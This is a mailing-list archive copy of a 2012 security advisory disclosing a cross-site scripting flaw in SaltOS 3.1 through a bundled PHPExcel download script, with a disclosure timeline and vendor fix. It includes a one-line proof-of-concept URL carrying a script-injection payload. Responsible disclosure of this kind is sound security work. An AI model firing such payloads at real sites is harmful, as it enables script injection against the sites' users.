[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
SaltOS 3.1 Cross-Site Scripting vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: SaltOS 3.1 Cross-Site Scripting vulnerability
- From: sschurtz@xxxxxxxxxxxxxxx
- Date: Thu, 23 Aug 2012 06:43:12 GMT
Advisory: SaltOS 3.1 Cross-Site Scripting vulnerability
Advisory ID: SSCHADV2012-018
Author: Stefan Schurtz
Affected Software: Successfully tested on SaltOS 3.1 r4908
Vendor URL: http://www.saltos.net
Vendor Status: fixed
==========================
Vulnerability Description
==========================
SaltOS 3.1 is prone to a Cross-Site Scripting vulnerability, because of using
PHPExcel 1.7.7 (latest version)
==================
PoC-Exploit
==================
http://[target]/SaltOS-3.1/user/lib/phpexcel/PHPExcel/Shared/JAMA/docs/download.php/
'><script>alert('xss')</script>
=========
Solution
=========
Unused directories (docs, examples and tests directories from the
PHPExcel/Shared/JAMA directory) are removed.
Update to the latest version (Fixed in the nightly build r5696 from 2012-08-14).
====================
Disclosure Timeline
====================
13-Aug-2012 - developer informed
13-Aug-2012 - feedback from developer
14-Aug-2012 - fixed by developer
========
Credits
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.darksecurity.de/advisories/2012/SSCHADV2012-018.txt